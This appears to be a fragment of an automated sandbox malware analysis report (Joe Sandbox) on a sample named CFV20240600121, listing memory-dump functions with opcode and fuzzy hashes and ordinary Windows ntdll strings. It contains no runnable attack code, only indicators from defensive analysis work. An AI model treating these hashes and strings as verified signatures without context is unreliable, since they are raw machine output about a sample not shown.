                                        • Opcode Fuzzy Hash: e69498545271a8cb7a57ab517de11c9f63cc918af5c30a6dc82653f4c0fc91fe
                                        • Instruction Fuzzy Hash: D690022130141103D1407158541960A4045EBF1301F95D012E0414555CDE2589965322
                                        Function 01412DD0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5881365d22ce2f0c363377e842865b430f6a5cad5ee6e28e4f9e1e27c8ded426
                                        • Instruction ID: b33f7b66dfc4fdcad82571de4817a34bdfc1406293e13c8ea65631c5384197d8
                                        • Opcode Fuzzy Hash: 5881365d22ce2f0c363377e842865b430f6a5cad5ee6e28e4f9e1e27c8ded426
                                        • Instruction Fuzzy Hash: 2E900221242452525545B158440550B4046ABF02417D5C013E1414951CCA369996D721
                                        Function 01412DB0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d83d809a1317842ff6534e03dfba2336f4c9de074fd1eaa1be7dbd95a786a340
                                        • Instruction ID: 1fee5f940881aafbdf5500c12992a06c36ccf5cb35e22b61b330c61c3b77c7cd
                                        • Opcode Fuzzy Hash: d83d809a1317842ff6534e03dfba2336f4c9de074fd1eaa1be7dbd95a786a340
                                        • Instruction Fuzzy Hash: 3C90023124141502D1417158440560A0049ABE0241FD5C013E0424555ECB658B96AB61
                                        Function 01412C60 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 193a6b60fdceb0db25ac81c6c69684cd4dae64447d950d72f9f60b9ff5babf62
                                        • Instruction ID: 1e3f3040356f96e633398d757f6cbcc65a88c2e4d7c4737ae08a965674921749
                                        • Opcode Fuzzy Hash: 193a6b60fdceb0db25ac81c6c69684cd4dae64447d950d72f9f60b9ff5babf62
                                        • Instruction Fuzzy Hash: B690023120141942D10071584405B4A00459BF0301F95C017E0124655DCB25C9917621
                                        Function 01412CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17079b87d0b24ae5cc4a18f8174e77548a7ae420d4840b707d43c012e8ec18e8
                                        • Instruction ID: abf2e956363cd33a31764c3780a6bcd942ed3610d0593ff70f8e5c3911312090
                                        • Opcode Fuzzy Hash: 17079b87d0b24ae5cc4a18f8174e77548a7ae420d4840b707d43c012e8ec18e8
                                        • Instruction Fuzzy Hash: 5A90022160541502D1407158541970A00559BE0201F95D012E0024555DCB698B9567A1
                                        Function 01412CF0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7480f1533ae9822e8f21394d6183a3777c14528c9ea213589a708175118c14da
                                        • Instruction ID: 4f6e0e9000d1127d67662dd0b56ef88050fd08eeb7a6f346c40292f6c2ab050f
                                        • Opcode Fuzzy Hash: 7480f1533ae9822e8f21394d6183a3777c14528c9ea213589a708175118c14da
                                        • Instruction Fuzzy Hash: 2590023120141503D1007158550970B00459BE0201F95D412E0424559DDB6689916221
                                        Function 01412CA0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43fa5a11307759a65bba0f2701d62df4ebde044a75ab4dab18bce1aaf63454c4
                                        • Instruction ID: 2a33f86236f69ed98554ae281a18f639648b1e7f79cea17d56d47001610d03f3
                                        • Opcode Fuzzy Hash: 43fa5a11307759a65bba0f2701d62df4ebde044a75ab4dab18bce1aaf63454c4
                                        • Instruction Fuzzy Hash: 5E90023120141502D1007598540964A00459BF0301F95D012E5024556ECB7589D16231
                                        Function 01412F60 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a49327b80663453f1e71d0b9a4ed782c65f25374d3c007bd91cd307b0a2ba27a
                                        • Instruction ID: 21f139c34a9e0596791523c092c63807a151bde98899be7d57a655ef3a493c46
                                        • Opcode Fuzzy Hash: a49327b80663453f1e71d0b9a4ed782c65f25374d3c007bd91cd307b0a2ba27a
                                        • Instruction Fuzzy Hash: 8490026121141142D1047158440570A00859BF1201F95C013E2154555CCA398DA15225
                                        Function 01412F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2247a39d11a3274d794f6c665f16abec0e876e25b9c804fabdd813e122bfc24
                                        • Instruction ID: 238aab3bc5d03b0985a88b513c3059dbbaffa1e44adf9f902ece15dfcba482dd
                                        • Opcode Fuzzy Hash: b2247a39d11a3274d794f6c665f16abec0e876e25b9c804fabdd813e122bfc24
                                        • Instruction Fuzzy Hash: B590026134141542D10071584415B0A0045DBF1301F95C016E1064555DCB29CD926226
                                        Function 01412FE0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50ce21beab5c955adae964e1b99dd0d6f5e1234694d5f3577de96be78cf93134
                                        • Instruction ID: af3c25d582378c8e77d39e6d80576f55f96df800356f6807a532bf0f5271d472
                                        • Opcode Fuzzy Hash: 50ce21beab5c955adae964e1b99dd0d6f5e1234694d5f3577de96be78cf93134
                                        • Instruction Fuzzy Hash: 0D900221211C1142D20075684C15B0B00459BE0303F95C116E0154555CCE2589A15621
                                        Function 01412F90 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bab24eb6d54080b53c3876fdf5faeae5586f5687802de4ca407e309913a0754b
                                        • Instruction ID: c53c588205404ef93338fb1f4152e2ce4e353dea4555c7671f60566a7511bdc5
                                        • Opcode Fuzzy Hash: bab24eb6d54080b53c3876fdf5faeae5586f5687802de4ca407e309913a0754b
                                        • Instruction Fuzzy Hash: 5590023120181502D1007158481570F00459BE0302F95C012E1164556DCB3589916671
                                        Function 01412FA0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2eb605a038862a91a435bd3997903eab120ea1794725c2c0d0b692227119c685
                                        • Instruction ID: 0369fc944a8f2592decb91c1b128897452a60cdb649a4d9f9465f1ba049162ce
                                        • Opcode Fuzzy Hash: 2eb605a038862a91a435bd3997903eab120ea1794725c2c0d0b692227119c685
                                        • Instruction Fuzzy Hash: 2590023120181502D1007158480974B00459BE0302F95C012E5164556ECB75C9D16631
                                        Function 01412FB0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 20d9401cfe1ab5823d42e0c5dbd84983d8d1522278073da990e98f0229b0c053
                                        • Instruction ID: c759cac84e2dea43367a50fc5e68491f5583ef613d819986f20aa8af3f2717b0
                                        • Opcode Fuzzy Hash: 20d9401cfe1ab5823d42e0c5dbd84983d8d1522278073da990e98f0229b0c053
                                        • Instruction Fuzzy Hash: 0F9002216014114241407168884590A4045BFF1211795C122E0998551DCA6989A55765
                                        Function 01412E30 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 933a53a7d1f50228d84c29d842fd212f3d5be5e7c56f36488e036346290a5dd5
                                        • Instruction ID: 5f3031ac4cdb739dc5c803f35d127d5d81984e69342352febe913ded7fed9994
                                        • Opcode Fuzzy Hash: 933a53a7d1f50228d84c29d842fd212f3d5be5e7c56f36488e036346290a5dd5
                                        • Instruction Fuzzy Hash: AF90022130141502D1027158441560A0049DBE1345FD5C013E1424556DCB358A93A232
                                        Function 01412EE0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6e01e15ce9dcdd0123f114417439100cf6696b8934b30e472434e5c914c5ff3d
                                        • Instruction ID: c08d84d60f576ddcf8e5c34d9ce74ede90503b00fae7ba2bd5100aff03b82163
                                        • Opcode Fuzzy Hash: 6e01e15ce9dcdd0123f114417439100cf6696b8934b30e472434e5c914c5ff3d
                                        • Instruction Fuzzy Hash: 6B90026120181503D1407558480560B00459BE0302F95C012E2064556ECF398D916235
                                        Function 01412E80 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40caca910e632411ae6d135e1bf3f5b9cee8b193f9fb3194c44b1874f95b8b3c
                                        • Instruction ID: e7a68097b806f7327307dd2fdcb44b3e81695a2973b2ecd3baf71fe1b17eb4c8
                                        • Opcode Fuzzy Hash: 40caca910e632411ae6d135e1bf3f5b9cee8b193f9fb3194c44b1874f95b8b3c
                                        • Instruction Fuzzy Hash: 4890022160141602D1017158440561A004A9BE0241FD5C023E1024556ECF358AD2A231
                                        Function 01412EA0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b02bbcf7aaf27c9a5ef59eeb66982f18bb9322d673f3c6bbdfb3a6c99f00dcba
                                        • Instruction ID: 1be5414b8dc5f743ff60df7ad223cb730e2a59fe983234a9c331ef663c4797fc
                                        • Opcode Fuzzy Hash: b02bbcf7aaf27c9a5ef59eeb66982f18bb9322d673f3c6bbdfb3a6c99f00dcba
                                        • Instruction Fuzzy Hash: D590027120141502D1407158440574A00459BE0301F95C012E5064555ECB698ED56765
                                        Function 01413010 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b4bbd29ee0cf9ec72778032e378d3c4bd5faf3969337c662d9459ba01830931
                                        • Instruction ID: 5a247119c50401ea8ceac6526af1a3bd419d5bf7429b326688cc9692e0de461f
                                        • Opcode Fuzzy Hash: 7b4bbd29ee0cf9ec72778032e378d3c4bd5faf3969337c662d9459ba01830931
                                        • Instruction Fuzzy Hash: B990022120185542D14072584805B0F41459BF1202FD5C01AE4156555CCE2589955721
                                        Function 01413090 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 998b77374f0e27b54b486c047f521dfe92a1b50028d37a3ba56331a21012b8c1
                                        • Instruction ID: a05a0cf6a17b46786cf94655dde723e81fcf86df8be0a2067092c6f32c36f363
                                        • Opcode Fuzzy Hash: 998b77374f0e27b54b486c047f521dfe92a1b50028d37a3ba56331a21012b8c1
                                        • Instruction Fuzzy Hash: C790022124141902D1407158841570B0046DBE0601F95C012E0024555DCB268AA567B1
                                        Function 014139B0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f56c50d24e7d9e68aa073b7627bfcef2572cb943542f0cb61fcf7c8340629dc
                                        • Instruction ID: e7b4eb0bd66304441a14f44b76c3e2da812f38b7090069f9fcb93d6cce4969a3
                                        • Opcode Fuzzy Hash: 7f56c50d24e7d9e68aa073b7627bfcef2572cb943542f0cb61fcf7c8340629dc
                                        • Instruction Fuzzy Hash: 9190022124546202D150715C440561A4045BBF0201F95C022E0814595DCA6589956321
                                        Function 01413D70 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e457d13007697aecc11de3875e7e01f0d851c0c205c5eba8149a729459c5679b
                                        • Instruction ID: 6135fc2a36a637eb25097a254b7f01aae29bab2fb22775a52e7833405a00c0af
                                        • Opcode Fuzzy Hash: e457d13007697aecc11de3875e7e01f0d851c0c205c5eba8149a729459c5679b
                                        • Instruction Fuzzy Hash: FF90023520141502D5107158580564A00869BE0301F95D412E0424559DCB6489E1A221
                                        Function 01413D10 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c252f69d391bf0ba5517534d0d0a07065739d5279c7b6aa518c6db51784d82bd
                                        • Instruction ID: 964579587334663cce323a0dd9d60dabf30e9516381cb62101e467a8fe575391
                                        • Opcode Fuzzy Hash: c252f69d391bf0ba5517534d0d0a07065739d5279c7b6aa518c6db51784d82bd
                                        • Instruction Fuzzy Hash: 5B90023120241242954072585805A4E41459BF1302BD5D416E0015555CCE2489A15321
                                        Function 01412C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction ID: 44706a6f7cc2539bc3ffdb999a7d8fe60d24cff611570a1b0ff6564c10acbe15
                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction Fuzzy Hash:
                                        Function 01412890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                        • API String ID: 48624451-2108815105
                                        • Opcode ID: 82c994cf5cae305d2f5bf9a63d7d8a7eeec9b3c7b5c95b91dc8b0aee389167e6
                                        • Instruction ID: 3c666c8c602a7436c022e421479a2d93ca12310cacfdd06407e6e6c5aa8602e1
                                        • Opcode Fuzzy Hash: 82c994cf5cae305d2f5bf9a63d7d8a7eeec9b3c7b5c95b91dc8b0aee389167e6
                                        • Instruction Fuzzy Hash: F751D3B6A00116AFDB11DB9D8980D7FFBB8BB18240764822AE469D7755D374DE408BE0
                                        Function 01482410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                        • API String ID: 48624451-2108815105
                                        • Opcode ID: f7e1aaae65fa0e1cb4a27ffe5066b0f0347002797aa2faf1c918e8ed9cd06dac
                                        • Instruction ID: f5915e0302fe9a1ee27e3df84c677287b8fcc8b2cf853434e569ff46ffb7ca4b
                                        • Opcode Fuzzy Hash: f7e1aaae65fa0e1cb4a27ffe5066b0f0347002797aa2faf1c918e8ed9cd06dac
                                        • Instruction Fuzzy Hash: C451F1B5A40646ABCB20EE9DC990C7FBBF8AF44604B44846FE496D3751E6B4EA40C770
                                        Function 01407630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                        Download Yara Rule
                                        Strings
                                        • Execute=1, xrefs: 01444713
                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01444655
                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01444742
                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01444787
                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014446FC
                                        • ExecuteOptions, xrefs: 014446A0
                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01444725
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                        • API String ID: 0-484625025
                                        • Opcode ID: 9288f749834beb8260f153de1bd99db3adeb50b605f6a5fbf6cccf4879fbe1b9
                                        • Instruction ID: 56d79bbbe2b13ddec0dbfd157f7e467f31e393aa242b5d655935a21e7f00c91b
                                        • Opcode Fuzzy Hash: 9288f749834beb8260f153de1bd99db3adeb50b605f6a5fbf6cccf4879fbe1b9
                                        • Instruction Fuzzy Hash: 77515E316002096AEF12DB9ADC95FBA37A8AF14355F0404BFE609972F1E770BA458F52
                                        Function 014A6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                        • Instruction ID: 9ee181ecde0780c9fff5e535c21b7e077a6eca9caef12bdb0a6bd68cf0df39f1
                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                        • Instruction Fuzzy Hash: 62022771508342AFD315CF19C490A6BBBE5FFE8710F46892EFA894B264DB71E905CB42
                                        Function 0141B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: +$-$0$0
                                        • API String ID: 1302938615-699404926
                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                        • Instruction ID: 9f4e7bb922fc30c3dfd48fd2d46b1ad54a946f28fabd8ad5e688075d2d32057f
                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                        • Instruction Fuzzy Hash: 5F81CF70E052498EEF258E6CC8907FEBBB1EF55720F18451BE865A73B9C7348841CB62
                                        Function 014820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: %%%u$[$]:%u
                                        • API String ID: 48624451-2819853543
                                        • Opcode ID: 6210f59d735ec7bd4227baf012eeca2d93dece08ae8578c89caf57a80fc5aa02
                                        • Instruction ID: 33534ab36d2fa68bed9f6e4bd5ed7be38928d5ee4a5decab3d6d325ba53ee67d
                                        • Opcode Fuzzy Hash: 6210f59d735ec7bd4227baf012eeca2d93dece08ae8578c89caf57a80fc5aa02
                                        • Instruction Fuzzy Hash: 7121517AA0011AABDB11EF69D840EAFBBE8EF54644F54011BE905E3214E770D911CBA1
                                        Function 013FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                        Download Yara Rule
                                        Strings
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014402BD
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014402E7
                                        • RTL: Re-Waiting, xrefs: 0144031E
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                        • API String ID: 0-2474120054
                                        • Opcode ID: 50a7ba8d392e8b9df5f24d91e13d172b94ff09ada8a5aa3d28ea10ddb810ba7e
                                        • Instruction ID: 64a167707d2b1f2ef8c2b64449834b3e1f95807ba963c1085d4f85dce6a75e34
                                        • Opcode Fuzzy Hash: 50a7ba8d392e8b9df5f24d91e13d172b94ff09ada8a5aa3d28ea10ddb810ba7e
                                        • Instruction Fuzzy Hash: A2E1CF316047419FE725CF28C884B6ABBE8BB84728F140A1EFA95CB3E1D775D855CB42
                                        Function 0140BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                        Download Yara Rule
                                        Strings
                                        • RTL: Resource at %p, xrefs: 01447B8E
                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01447B7F
                                        • RTL: Re-Waiting, xrefs: 01447BAC
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                        • API String ID: 0-871070163
                                        • Opcode ID: f0de20c509b078644209f733e27839bb99cf48c05e178ed846b3bb60ac5024cc
                                        • Instruction ID: d7ec1faf01a76c3f783997073351ffcdc401e5aced1dd8971c03687a70b0188e
                                        • Opcode Fuzzy Hash: f0de20c509b078644209f733e27839bb99cf48c05e178ed846b3bb60ac5024cc
                                        • Instruction Fuzzy Hash: 2B4108353007024FD721DE2AC850B67B7E5EF94715F10092EFA56D77A0D731E8068B95
                                        Function 0140B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                        Download Yara Rule
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0144728C
                                        Strings
                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01447294
                                        • RTL: Resource at %p, xrefs: 014472A3
